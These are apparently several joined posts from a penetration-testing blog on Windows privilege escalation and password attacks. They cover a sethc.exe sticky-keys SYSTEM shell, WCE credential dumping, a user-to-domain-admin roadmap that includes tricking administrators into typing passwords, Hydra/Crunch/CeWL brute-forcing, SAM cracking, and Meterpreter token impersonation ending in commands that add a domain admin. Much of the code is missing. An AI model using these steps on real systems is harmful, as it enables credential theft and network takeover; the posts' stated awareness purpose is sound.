Let’s try to run WCE using the -w option. Note that you must be a priveliged user to run this tool.

It’s pretty simple: WCE shows every passwords cached; in clear text.
Let’s assume that the pc CLI01 is joined to a domain and let’s see what happen if some service is started using domain admin password:

WOW! The domain admin password stored locally is showed.

How many service are misconfigured in your network? Let’s hope very few because you are a very good sysadmin and no service starts with domain sensitive password, but what about social engeneering?
Each time a user is begging for a password for an installation or he asks to you something that leads to digit your admin password on his pc, is it a legittimate request or does he wants your password cached?
So, you domain admin, what kind of password do you use on company users pc? The domain-admin-super-God password or the local pc password?

Basing ourselves on this and the previous post let’s now compile an hypothetical roadmap from simple user to domain admin:
1- Boot the company Microsoft PC using a CD/DVD with a bootable operating System
2- Use the sethc “feature” to become local admin
3- Begging for a domain admin password (“Please I need the latest java update, but I need your password”, “I’m trying to add a new charset, but the pc is asking for an admin password…”)
4- Run WCE and become domain admin
5- Use some other tool like pstool and collect the password of every user of the network

I think that these are the defences that a network/system admin can adopt:
1- No external device boot allowed and PC and case locked
2- No remediation on this (may be some domain policy). Remember that also Linux has a level 1 booting.
3- Users are invasive and dangerous, even if they don’t want your password. So Always log on their PCs always with the lowest privileges you can.
4- WCE must blocked to users (AV rule, policy, firewall)
5- If an attacker reach this point you will probably spend the next weeks searching another job in another city

The scope of this post is to make system admininistrators and everyone else aware on how to take care about IT security.
Many times, working as sysadmin, we make mistakes, we are pressured and we sometimes left open ports saying “I will patch them later”, but we always have to remember what risks we are taking.
An attack, talking about computer and network, often starts from the bottom and, little by little, try to reach the top; a small door open gives the way for another gate an so on. This process is called Privilege Escalation.

This is an old method that I rediscovered after many years and, with big surprise, is still present on modern MS operating systems (win 7 and 8).
At the base of this “feature” I’m going to describe there is a windows executable: c:\windows\system32\sethc.exe (but it’s not the only way: you can also use shutdown.exe).

If you have a Windows system you can activate this program by pressing 5 times the left SHIFT, this operation runs the executable (sethc.exe).

There are two problems if you analyze this situation: first it can be runned also in the login screen before authentication, second the privilege used to run the executable is SYSTEM (in the login screen no user is already logged in)
This is quite terrible.
Before, in XP sp2 and early xp sp3, this file was used to escalate privilege whitout phisycal access to the pc: the file was accessible by everyone and was not locked by the system, so a user could remove the legittimate sethc.exe, copy the cmd.exe from the same folder and rename it in sethc.exe.

What was the window that poped-up when the user hits CTRL for 5 times after this alteration? A CMD shell! What was the privilege of this shell? System!
Luckily Microsoft patched this problem in late XP sp3 and now the file is locked and can’t be manipulated when the Operating System is started, but the setch.exe is still there.

Some weeks ago I had some problems to access a windows laptop (win 7 SP1). Although I had the authorization to access to it I didn’t have the password to enter and no options to recover it. so I tried this:
I put a linux bootable CD and boot the pc using it. Then I simply mounted the windows file system and used some command like this:

Than I rebooted the system from HD and, when in the login screen, I simply pressed 5 times the left SHIFT.Ta-da! I got a SYSTEM shell.
I used a basic command line to create a new user and put it in Administrators group and, less than 5 minutes later, I had the full graphic control of the box.

This caused me a hundred of ideas, so, put aside this latop, I went on with my tests.
I tried it over a Win8 box, on a domain PC and against a server with strong domain policy and every time it worked fine.

So this is my assume (but you can refute):
If you have physical access and if you can boot from an external device (using bios or physically adding a new HD to the pc case) you can log into a Windows pc using SYSTEM privilege.

That’s why in every Company, that believe in IT security, the external device booting, the PXE, and the access to the PC case must be regulated.

ASAP I will write some example to become Domain admin strarting from this point, to highlight how dangerous is every litle door that a sys admin leaves open.

I’m not talking here about the exploit, but only about the shellcode creation and choices motivations. This exemple can be easly fit to other situations and replicated without inserting it in an exploit, but simply tested in a developer or in a custom binary file.

I started from this sample code. It uses the Windows API function MessageBoxA to popup a message

Looking up the MessageBoxA function in Google reveals four arguments:

So the sample code pushes in the stack all the arguments and then call the address of the function already loaded in memory.

Some things to underline:
– at the end of every argument a null byte is insered (\x00)
– the arguments are pushed in reverse order into the stack (LIFO)
– this is only a shellcode and it has to be appended to a program; this program must have the function MessageBoxA (user32.dll) loaded in memory.
– the address of the function (0x7E45058A) is hadrcoded and works only on the Operating System the shellcode is written for.
– the hardcoded address doesn’t work in random space address context (ASLR or EMET)

Starting from this sample I want to use the System() function to pass commands to the interpreter (typically CMD.EXE); I search in MSDN specifications and I found that it needs only one parameter: the command I want to pass.

First I have to determinate, using the debugger, if the function is loaded in memory, so in Olly I search for “Names in all modules” and, luckly I found it in the msvcrt.dll (Figure 1) at address 0x77BF93C7 (Figure 2).

Figure 1

Figure 2

So the testing shell code will be like this:

Ok, now I have the test shellcode; I can do it directly in Olly. I open the debugger, attach a program, edit the first few lines, put a brake point at the end of my code and run the program (Figure 3).
Remember that the msvcrt.dll must be one of the module loaded by the program attached to the debugger.

Figure 3

Note that the net user/net localgroup need the admin privilege to be executed, so in a real exploit the target program must be started using elevated rights. On the other hand the first command, the echo one, will work also with low privilege.

The Password Attacks on Kali Linux [Part 1]

What is the weakest part of the security chain? You know the answer: the one who stand between the keyboard and the desk chair. And what does this user do on her/his first job day? Set a password. Yes, a big part of our security environment lies around that password.

Of course we talk about internal password because Nerwork Administators have well learned the lesson and secure their external accounts with encryption, strong policy, access restriction; in spite of this the internal accounts are the heaven for hackers (and the hell of sysadmins).
Nowadays internal users are, fortunately, low-privileged and some kind of policy forces a little of security, but even if your policy is set with more than 8 characters with numbers, upper and lower case, there will be a user that set as password something like AAAAaaaa1 or Password1.

The complete takeover of a net is a stairway that goes through information gathering, network discovering, password cracking and system owning. Also, finding a low-privilege password is one stair over and it’s actually one of the biggest gap that a penetration tester has to pass. If you find a password, you can quickly test it on other systems and services previously discovered (ssh, ftp, mail): users have the bad routine to use the same keyword for different services.
When you discover a password, you can make an idea about the security company policy and you can try a widespread brute-force attack. If you find, for example, a key of 8 characters, all low case, you can try an attack using this setting on all systems of the LAN. Even if you find a key word from user that isn’t administrator or root there are lot of well-known privilege escalations that can be attempted, especially for old or unpatched system.
Other options that can be used, when you owned a PC with an unprivileged account, are: sniffing traffic,
extracting stored credentials or pivoting other attacks. All these things lead you over and over inthe stairway. In substance, a right association user-password is one of the core success on a pentest and it’s all trusted to an user and his password, that he has chosen on his first job day.

Some terms
Let’s start making a specification. There are two common names you can hear talking about password attack: BruteForce and WordList.
Brute force is when the password is tested using all designated characters, using a set length. The following is an example: use character ‘a’, ‘b’ and set length 2. The password that will be tested are aa, bb, ab and ba; these are 4 tries. You can calculate the amount of attempts: quantity of characters elevated to length used, in this case 2^2=4. Because it is an exponential, it can be become very difficult to test something with ten characters using full ASCII set: according to Password time calculator by lastbit.com this BruteForce attack will take up to 4274902 years.
BruteForce attack, but a WordList one, where what will be used as keys are all single words present in one list.
Note that the password used is exactly the same written in the list. So if in the document there’s the word ‘backup’ only this word will be tested and not ‘Backup’ or ‘back-up’; fortunately there are programs that make these permutations automatically.
So wordlists are often a smarter attempt than a bruteforce attack; in spite of this, during a pen test, you must have a very strong reason to spend hours for this kind of attack.
Of course the following password attacks are done using Kali Linux, because it has every tool you’ll need. Thanks to OffensiveSecurity, Kali Linux, like its father BackTrack, is one of the most used pentesting distributions. If you are reading here you known what we are talking about.

Create your user and password list
To perform a wordlist attack you need, of course, a list of words. There are many techniques to create it, and many places where you can find a precompiled one, but the best way is to create a document based on your needs. From my personal opinion, in this case, is necessary to start from locating valid usernames from the network I‘m testing and using these as a first simple list, trying blank, username as password or very simple passwords.
The harvest, by Edge-Security Research, is a very useful tool that helps you by searching for a company name in various resources database (Google, Linkedin, PGP, Bing…) and then extracts for you probable user names. In the Figure 1 you can see the result of a research: maybe vdiaz, cdelojo and cmartorella are also FTP, SSH or RDP users.
Then you can try to locate some useful accounts from the company website: e-mails and documents such as pdfs, docs or similar can be downloaded to gain such information. You can automate the operation by using another tool by Edge-Security Research: metagoofil (see Figure 2).

Figure 1

Figure 2

Another way to find usernames, when you are in the testing-Company LAN, is to locate a mail server and an SNMP service. Mail server can be vulnerable to VRFY command and you can use it to probe the system for login names. The VRFY is a licit command and fortunately, in modern system, is disabled to patch this security issue, but sometimes you can still use it. Let’s look how it works using a simple Netcat connection:

If the system is vulnerable, smtp-user-enum program can be used to get some usernames; the following is the basic command to use it:

Note that the option -U uses a wordlist in order to find names. If you haven’t one you can find some preloaded in Kali using a command like this:

However the suggestion is to keep your list under 100-150 names. Smtp-user-enum can also be used to test the EXPN function; EXPN is similar to VRFY, but it is used on distribution list and it lists all its users. This can be a bigger problem than the VRFY since sites sometimes have an alias such as “all”.
Another way to compile your focused user list is SNMP analysis. SNMP is a protocol based on UTP that is often used to monitor servers’ service status.
The distribution lists (community strings) are passed in clear and often have the default state (public or private), so you can easily try to find it in order to query the server and get many information.
You can use a combination of Onesixtyone and Snmpcheck; the first can be used to enumerate community strings, so, after locking on the hosts with SNMP service, the program can be run.

The dict.txt is a wordlist (another one) of possible community strings and it is already present in Kali; the host-snmp.txt is a file with the IPs of all hosts with the SNMP service active in the network. The word in the square brackets (see Figure 3) is what you are searching for and the next step is to use this word combined to Snmpcheck to extract data from the service.

Figure 3

In this example the output is limited to the user accounts (grep -a “User accounts” -A 11), but you can get much more info using SNMP such as processes running, programs installed, open ports, network and routing configurations, storages information and much more.

There are several ways to find a username in the net: if something similar to PC-pedro or Maria’s MacBook is found the assumption is that Pedro and Maria are likely to be usernames that will have access on these computers. It’s important to compile the user list meticulously and add every possible username you find, so you can use it later.

Finally you have a user list that will help you in a first simple password attack.
If you will have no results you’ll wish to make some simple extensions to that list using John the Ripper (JtR) or you’ll try another small wordlist like /usr/share/john/password.lst; also in this case JtR can be used to make some little changes.
Let’s see some usage of John the Ripper password cracker by Openwall. Note that this program does more than what you’ll read here. You will see now, how make some simple mutations in order to upgrade your user list and use it as a password list.
The idea is to create something that leads from an input as ‘root’ to an output like Root, ROOT, rootroot, toor, Root1 and so on. Well, let’s expand a small file (wordlist.lst) with only ‘root’ and ‘password’:

In this case a default rule set is used (--rules), but you can modify it using /etc/john/john.conf; note that with 2 words JtR generates 100 words instantly.
The output is normalized, in this case, using tr -s '\n' ' ', but you can remove this part of command and redirect all in a file that fits your needs. Later,
talking about offline attacks, you’ll come across JtR again and you’ll find some other awesome features. Even though, I think, using a huge wordlist is not a good idea, it can be useful to know how to make it, so here are two great tools.
The first is CeWL, you can use it to dig a Company web site to extract words and convert these in a list. The basic usage is very simple and the impact awesome:

You can even use it to extract usernames by pointing CeWL to sites that collect popular birth names. Similarly you can use it to create monothematic wordlists: animals, plants, countries, cars, “Lord of the Rings”, topic words and so on.
The concept I’d like to remark is that in an online password attack you are connected to the LAN: you make network traffic, you stress systems and you can’t stay there all night and day long.
The second tool is Crunch. It can be used to create a word list too, but starts from a different point of view compared with CeWL. Crunch is more like a bruteforce: it generates all words using some parameters you set. Essentially you establish min and max length and a charset (or use the default one); so you can create all possible combinations of characters a, b, c with length from 2 to 4 using the following command:

More specific and interesting usage can be read in the manual page, like the -t option: you can take one word and append some characters to it:

The output can be sent to the screen, to a file, or to another program; this last option allows the use of Chunch directly on an online/offline cracking operation without physically generating a wordlist, saving hard disk space.

Online Password Attack
One of the best tools to complete the online attack is Hydra. This program is tasked to join your lists and to perform the attack over a network service.
The figure 4 explains how it works: it puts together a username list, a password list and a host list split by services to attack (FTP, RDP, SSH, MySQL…).
Then it starts to try every username and password associations on every hosts. Some other parameters can be set such as proxy or the number of tasks; very useful when attacking some cranky service like RDP.

Figure 4

The following is the command that performs a wordlist attack against all FTP hosts in the net:

The -L, -P and -M options are used to point to the wordlists of users, passwords and hosts and can be replaced by -l, -p and a IP to use a single name, password or target. -s is the port to attack and the ftp at the end is the service used as target. -V stands for verbose and -e option tries n null password, s login as pass and/or r reversed login. Finally -t is the number of task that Hydra will use.
The simplest way to learn the use of this tool is to take a look at the GUI xHydra (see Figure 5).

Figure 5

Hydra is the end (maybe happy) of the online password attack, but it is no more than a task executor. Its force lies in the wordlists you will be able to create, don’t forget this.

[end of part 1]

An alternative, when the operating system is working, is to take the two twins files present in folder c:\windows\repair\ that the system create as a backup. This work up to Windows XP (think also Vista), but I can’t be able to find these files on Windows7. If you know something more, write me.

Once you have the files you use bkhive to extract the bootkey:

Then put together the bootkey and the SAM file:

And then try to crack the hash:

This is just an exemple of use of this tools. To crack hash you can algo use google that is always the bigest resource.

The domain is called LAB.local based on Windows 2008R2. LABServer07 is the primary DC.
The exploited machine is joined to the domain and we got a Meterpreter shell with local PC admin rights.

Basic command used after exploit:
Find process –> meterpreter > ps
Load incognito extension –> meterpreter > use incognito
Listing available tokens –> meterpreter > list_tokens -u
Impersonate token –> meterpreter > impersonate_token
Get a command shell using the token –> meterpreter > execute -f cmd.exe -i -t -H -c
Add a domain User –> C:\WINDOWS\system32>net user USER PASSWORD /add /domain
Add the creted user in domain admin –> C:\WINDOWS\system32>net localgroup administrators USER /add /domain

Interact with session 1 and list process:

Load extension, list token and impersonate domain admin:

Get a domain admin shell:

Create new domain user and join to the domain admins group:

Obviously the victim PC is an Italian version, “esecuzione comando riuscita” means “Command completed successfully”